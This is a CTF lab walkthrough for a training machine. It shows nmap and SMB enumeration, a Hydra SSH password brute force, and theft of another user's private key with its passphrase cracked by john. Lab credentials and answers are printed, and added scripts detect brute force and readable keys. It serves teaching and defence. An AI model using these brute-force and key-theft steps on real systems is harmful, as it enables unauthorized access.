Setting-up
Task 1: Deploy the machine and connect to our network
Task 2: Find the services exposed by the machine
Reconnaissance
```sh
sudo nmap -sV -sC -O <ip-addr>
```
- `-sV` probe open ports for service and version information
- `-sC` run the default NSE script set
- `-O` OS detection (needs root, hence `sudo`)
Results:
```text
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-08 02:12 EST
Nmap scan report for 10.10.66.136
Host is up (0.31s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db45cbbe4a8b71f8e93142aefff845e4 (RSA)
| 256 09b9b91ce0bf0e1c6f7ffe8e5f201bce (ECDSA)
|_ 256 a5682b225f984a62213da2e2c5a9f7c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.7
|_http-title: Apache Tomcat/9.0.7
|_http-favicon: Apache Tomcat
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
| smb2-time:
| date: 2022-12-08T07:13:00
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2022-12-08T02:12:59-05:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.99 seconds
```
Summary of the exposed services:

| Port | Service | Version |
|---|---|---|
| 22/tcp | ssh | OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 |
| 80/tcp | http | Apache/2.4.18 (Ubuntu) |
| 139/tcp | netbios-ssn | Samba smbd 3.X - 4.X |
| 445/tcp | netbios-ssn | Samba smbd 4.3.11-Ubuntu |
| 8009/tcp | ajp13 | Apache Jserv (Protocol v1.3) |
| 8080/tcp | http | Apache Tomcat/9.0.7 |
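The summary table above was built by hand from the scan. As an added example that is not part of the original writeup, the following POSIX shell script does the same reduction automatically: it reads nmap's normal output and prints one tab-separated `port proto service version` line per open port. The scan text is the page's own result, embedded in a variable so the script runs offline; `open_ports` and `open_port_count` are names chosen here.

```sh
#!/bin/sh
# Added example: turn nmap "normal" output into a port/service/version table.

# Print "port<TAB>proto<TAB>service<TAB>version" for every open port in nmap
# normal output read from stdin. Matching lines look like:
#   22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
# Script output ("| ssh-hostkey:") and summary lines never start with "<n>/tcp",
# so they are skipped.
open_ports() {
    awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" {
        split($1, p, "/")          # p[1] = port number, p[2] = protocol
        ver = $4                   # version text is everything after the service
        for (i = 5; i <= NF; i++) ver = ver " " $i
        printf "%s\t%s\t%s\t%s\n", p[1], p[2], $3, ver
    }'
}

# Number of open ports in the same input: a quick "did the attack surface change"
# check between two scans of the same host.
open_port_count() {
    open_ports | wc -l | tr -d ' '
}

# Constructed sample: the port lines of the scan shown earlier on this page.
SAMPLE_SCAN='PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_ 256 a5682b225f984a62213da2e2c5a9f7c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel'

# Usage: feed a saved scan (nmap -oN scan.txt) or the sample into the function.
printf '%s\n' "$SAMPLE_SCAN" | open_ports
```

Run it against a real scan with `nmap -sV -oN scan.txt <ip> && open_ports < scan.txt`; the tab-separated output drops straight into `cut`, `sort` or a spreadsheet.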
Directory bruteforcing
To find hidden directories we perform directory brute forcing with a tool such as gobuster or dirbuster. In this case we are using gobuster:
```sh
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<target-ip>
```
- `dir` directory brute-force mode
- `-w` wordlist of common directory names
- `-u` target URL
Results :
```text
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.66.136
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/08 02:02:32 Starting gobuster in directory enumeration mode
===============================================================
/development (Status: 301) [Size: 318] [--> http://10.10.66.136/development/]
Progress: 4760 / 220561 (2.16%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/12/08 02:05:01 Finished
===============================================================
```
Task 3: What is the name of the hidden directory on the web server (enter name without /)?
```text
development
```
Visit `http://<target-ip>/development/` in the browser.
Let's check the contents of both files in that directory:
- dev.txt
- j.txt
These are the dev notes. Apparently the usernames of the web server's users start with "j" and "k"; we can definitely use this later. In addition, K mentions that "SMB has been configured", which matches the Nmap scan (ports 139 and 445 open).
SMB Enumeration
The smb-enum-* NSE scripts ship with nmap (in /usr/share/nmap/scripts on Kali), so no extra tooling is needed. Quote the glob so the shell does not try to expand it:
```sh
nmap --script="smb-enum*" <target-ip>
```
Results:
```text
nmap --script=smb-enum* 10.10.66.136
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-08 02:39 EST
Nmap scan report for 10.10.66.136
Host is up (0.30s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8009/tcp open ajp13
8080/tcp open http-proxy
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.66.136\Anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\samba\anonymous
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.66.136\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (Samba Server 4.3.11-Ubuntu)
| Users: 3
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
|_ Current user access: READ/WRITE
| smb-enum-sessions:
|_ <nobody>
| smb-enum-domains:
| BASIC2
| Groups: n/a
| Users: n/a
| Creation time: unknown
| Passwords: min length: 5; min age: n/a days; max age: n/a days; history: n/a passwords
| Account lockout disabled
| Builtin
| Groups: n/a
| Users: n/a
| Creation time: unknown
| Passwords: min length: 5; min age: n/a days; max age: n/a days; history: n/a passwords
|_ Account lockout disabled
Nmap done: 1 IP address (1 host up) scanned in 327.23 seconds
```
As we can clearly see, there are two shares: `Anonymous` (a disk share) and the hidden `IPC$` share. `IPC$` is the named-pipe endpoint Samba exposes for RPC; the enumeration above talked to it as `guest`, i.e. with no username or password. What we can actually leverage is the `Anonymous` disk share, which grants READ/WRITE to anonymous users, so we can open it with `smbclient` without any credentials. Note also the password policy reported for the domain: minimum length 5 and no account lockout, which is relevant once we start brute forcing.
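Reading share permissions out of a long NSE dump by eye is error-prone. As an added example that is not part of the original writeup, this POSIX shell script parses `smb-enum-shares` output and lists the shares a guest session can write to. The sample text is the scan result shown above, embedded so the script runs offline; `list_shares` and `guest_writable_shares` are names chosen here.

```sh
#!/bin/sh
# Added example: find guest-writable shares in nmap smb-enum-shares output.

# Read smb-enum-shares output on stdin and print "share<TAB>anonymous-access".
# A share header looks like "|   \\10.10.66.136\Anonymous:" and is followed,
# a few lines later, by "|     Anonymous access: READ/WRITE".
list_shares() {
    awk '
        $2 ~ /^\\\\/ && $2 ~ /:$/ {
            n = split($2, parts, "\\\\")   # split on backslashes: last part is the share
            name = parts[n]
            sub(/:$/, "", name)
            next
        }
        name != "" && $2 == "Anonymous" && $3 == "access:" {
            printf "%s\t%s\n", name, $4
            name = ""
        }'
}

# Disk shares that anonymous users can write to. IPC$ is excluded because it is
# the RPC named-pipe endpoint, not a place to drop or read files.
guest_writable_shares() {
    list_shares | awk -F '\t' '$1 != "IPC$" && $2 ~ /WRITE/ { print $1 }'
}

# Constructed sample: the smb-enum-shares block from the scan above.
SAMPLE_SHARES='| smb-enum-shares:
|   account_used: guest
|   \\10.10.66.136\Anonymous:
|     Type: STYPE_DISKTREE
|     Comment:
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\anonymous
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.66.136\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (Samba Server 4.3.11-Ubuntu)
|     Users: 3
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE'

printf '%s\n' "$SAMPLE_SHARES" | guest_writable_shares
```

Pipe a saved scan in with `nmap --script="smb-enum*" -oN smb.txt <ip> && guest_writable_shares < smb.txt`. A writable anonymous share is worth flagging on both sides of the engagement: for the attacker it is a drop point, for the defender it is a finding regardless of what the share currently contains.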
```sh
smbclient -N //<target-ip>/anonymous
```
`-N` suppresses the password prompt, which is all an anonymous session needs.

[screenshot: `ls` inside the share shows a single file, staff.txt]
staff.txt might contain some useful information, so let's pull it down with `get staff.txt` from the smbclient prompt and read it locally:
```sh
cat staff.txt
```
```text
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay
```
It seems we've found the "k" and "j" users that first showed up in the dev notes: Kay and Jan. SSH is open, and Kay's note to Jan (j.txt) tells us that Jan's password is weak, so let's run hydra against Jan's account to crack the password and get onto the server.
Task 4: Use brute-forcing to find the username & password
Task 5: What is the username?
```text
jan
```
SSH Bruteforcing
To brute force the password of a known username over SSH, Hydra is the usual tool:
```sh
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://<target-ip>
```
- `-l` a single username
- `-P` a file of passwords to try

Hydra itself warns that many SSH servers limit parallel connections; if you see connection errors, rerun with `-t 4`. With the default 16 tasks it still found the password within a few minutes:
```text
┌──(root㉿kali)-[/usr]
└─# hydra -l jan -P share/wordlists/rockyou ssh://10.10.66.136
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-08 03:04:02
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.66.136:22/
[STATUS] 128.00 tries/min, 128 tries in 00:01h, 14344273 to do in 1867:45h, 14 active
[STATUS] 98.67 tries/min, 296 tries in 00:03h, 14344105 to do in 2422:60h, 14 active
[STATUS] 94.00 tries/min, 658 tries in 00:07h, 14343743 to do in 2543:14h, 14 active
[22][ssh] host: 10.10.66.136   login: jan   password: armando
^C
```
> From this point we can login to the machine using **jan** and **armando** through ssh
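A run like the one above is extremely loud on the target: every attempt lands in auth.log as a `Failed password` line from the same source. As an added example that is not part of the original writeup, here is the defender's side: a POSIX shell script that counts sshd failures per source IP and per targeted username and flags sources above a threshold. The log lines are constructed to resemble a multi-task Hydra run against `jan`; the addresses `10.10.14.7` and `10.10.14.9`, the PIDs and the timestamps are made up.

```sh
#!/bin/sh
# Added example: spot an SSH password brute force in auth.log text.

# Count "Failed password" events per source IP from auth.log text on stdin.
# Output: "<count> <ip>", noisiest source first.
failed_logins_by_ip() {
    awk '/sshd\[[0-9]+\]: Failed password/ {
            for (i = 1; i <= NF; i++) if ($i == "from") { n[$(i+1)]++; break }
        }
        END { for (ip in n) printf "%d %s\n", n[ip], ip }' | sort -rn
}

# Count failures per targeted username. sshd logs unknown accounts as
# "Failed password for invalid user NAME", so skip the "invalid user" words.
targeted_users() {
    awk '/sshd\[[0-9]+\]: Failed password/ {
            for (i = 1; i <= NF; i++) if ($i == "for") {
                u = ($(i+1) == "invalid") ? $(i+3) : $(i+1)
                c[u]++; break
            }
        }
        END { for (u in c) printf "%d %s\n", c[u], u }' | sort -rn
}

# Print only source IPs with at least $1 failures (default 10).
brute_force_sources() {
    threshold="${1:-10}"
    failed_logins_by_ip | awk -v t="$threshold" '$1 >= t { print $2 }'
}

# Constructed sample auth.log: 12 failures from one source in a few seconds,
# one stray failure from another, then a successful login from the first.
SAMPLE_AUTH_LOG='Dec  8 03:04:02 basic2 sshd[1201]: Failed password for jan from 10.10.14.7 port 51230 ssh2
Dec  8 03:04:02 basic2 sshd[1202]: Failed password for jan from 10.10.14.7 port 51231 ssh2
Dec  8 03:04:02 basic2 sshd[1203]: Failed password for jan from 10.10.14.7 port 51232 ssh2
Dec  8 03:04:03 basic2 sshd[1204]: Failed password for jan from 10.10.14.7 port 51233 ssh2
Dec  8 03:04:03 basic2 sshd[1205]: Failed password for jan from 10.10.14.7 port 51234 ssh2
Dec  8 03:04:03 basic2 sshd[1206]: Failed password for jan from 10.10.14.7 port 51235 ssh2
Dec  8 03:04:04 basic2 sshd[1207]: Failed password for jan from 10.10.14.7 port 51236 ssh2
Dec  8 03:04:04 basic2 sshd[1208]: Failed password for jan from 10.10.14.7 port 51237 ssh2
Dec  8 03:04:04 basic2 sshd[1209]: Failed password for jan from 10.10.14.7 port 51238 ssh2
Dec  8 03:04:05 basic2 sshd[1210]: Failed password for jan from 10.10.14.7 port 51239 ssh2
Dec  8 03:04:05 basic2 sshd[1211]: Failed password for jan from 10.10.14.7 port 51240 ssh2
Dec  8 03:04:09 basic2 sshd[1215]: Failed password for invalid user admin from 10.10.14.7 port 51244 ssh2
Dec  8 03:05:01 basic2 sshd[1301]: Failed password for kay from 10.10.14.9 port 40011 ssh2
Dec  8 03:05:30 basic2 sshd[1320]: Accepted password for jan from 10.10.14.7 port 51290 ssh2'

printf '%s\n' "$SAMPLE_AUTH_LOG" | brute_force_sources 10
```

On a real host run `brute_force_sources 10 < /var/log/auth.log`. The threshold is deliberately low because legitimate users rarely fail more than a handful of times; the `Accepted password` line that follows the burst is the part an analyst should chase, since it is the successful guess.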
Task 6: What is the password?
```text
armando
```
Task 7: What service do you use to access the server (answer in abbreviation in all caps)?
```text
SSH
```
Task 8: Enumerate the machine to find any vectors for privilege escalation
## Gaining access through SSH
```sh
ssh jan@<target-ip>
```
Enter `armando` when prompted for the password. We have access!
Privilege Escalation
```text
jan@basic2:~$ cd ../kay
jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 kay kay 756 Apr 23 2018 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
jan@basic2:/home/kay$
```
Note that kay's `.ssh` directory is world-readable (`drwxr-xr-x`), while `pass.bak` is not. Go to the .ssh folder:
```sh
cd .ssh
```
Here you can see kay's RSA key pair. The task now is to get the private key onto our machine: transfer it with `scp` or `rsync`, or simply `cat id_rsa` and paste the contents into a file locally. Then convert the key into a hash john understands and crack the passphrase with rockyou:
```sh
ssh2john <id_rsa-file-you-copied.txt> > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
```
On Kali `ssh2john` is /usr/share/john/ssh2john.py if it is not on your PATH. There it is, we have the passphrase!
```text
john forjohn.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax (/home/local_host/id_rsa.txt)
1g 0:00:00:00 DONE (2022-12-08 03:31) 25.00g/s 2068Kp/s 2068Kc/s 2068KC/s behlat..bammer
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
Now log in to kay's account. The key file must not be readable by anyone else or ssh will refuse to use it, and it has to be passed explicitly with `-i`:
```sh
chmod 600 id_rsa.txt
ssh -i id_rsa.txt kay@<target-ip>
```
Enter `beeswax` as the passphrase for the key. Mission accomplished! The final password is in `pass.bak` in kay's home directory (the mode 600 file owned by kay in the listing above, which jan could not read):
```sh
cat ~/pass.bak
```
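The whole escalation hinged on one thing: a private key in another user's home directory that jan could read. As an added example that is not part of the original writeup, this POSIX shell script is the audit that would have caught it. It walks a directory tree, finds files that look like SSH private keys and reports any whose mode grants read access to group or others. The home directories it inspects are constructed in a temporary directory so the script runs offline; `readable_private_keys` and `make_sample_homes` are names chosen here, and the key contents are placeholders, not real keys.

```sh
#!/bin/sh
# Added example: find SSH private keys that other local users can read.

# Print every file under $1 that (a) is readable by group or other and
# (b) starts with a PEM or OpenSSH private-key header. Output is sorted so it
# is stable for diffing between runs.
readable_private_keys() {
    find "$1" -type f \( -perm -004 -o -perm -040 \) -print 2>/dev/null |
    while IFS= read -r f; do
        # Both "-----BEGIN RSA PRIVATE KEY-----" (PEM) and
        # "-----BEGIN OPENSSH PRIVATE KEY-----" end the same way.
        if head -n 1 "$f" 2>/dev/null | grep -q 'PRIVATE KEY-----'; then
            printf '%s\n' "$f"
        fi
    done | sort
}

# Build a constructed home tree: kay's key is mode 644 like the one jan read
# above, jan's is 600. Prints the root of the tree so the caller can clean up.
make_sample_homes() {
    root=$(mktemp -d)
    mkdir -p "$root/kay/.ssh" "$root/jan/.ssh"
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'constructed placeholder, not a real key' \
        '-----END RSA PRIVATE KEY-----' > "$root/kay/.ssh/id_rsa"
    printf '%s\n' 'ssh-rsa AAAA... kay@basic2' > "$root/kay/.ssh/id_rsa.pub"
    printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' 'constructed placeholder, not a real key' \
        '-----END OPENSSH PRIVATE KEY-----' > "$root/jan/.ssh/id_rsa"
    chmod 644 "$root/kay/.ssh/id_rsa" "$root/kay/.ssh/id_rsa.pub"
    chmod 600 "$root/jan/.ssh/id_rsa"
    printf '%s\n' "$root"
}

# Usage: audit the sample tree, then remove it. On a real host run
# readable_private_keys /home (and /root) as root.
HOMES=$(make_sample_homes)
readable_private_keys "$HOMES"
rm -rf "$HOMES"
```

The public key is deliberately left at 644 and is not reported, because only the private half matters. Fixing a hit is `chmod 600` on the key; the passphrase (`beeswax` here) bought kay nothing once the file was readable and rockyou was in play, so treat a readable private key as compromised and rotate it rather than relying on the passphrase.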
Task 9: What is the name of the other user you found(all lower case)?
```text
kay
```
Task 10: If you have found another user, what can you do with this information?
Task 11: What is the final password you obtain?
```text
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
```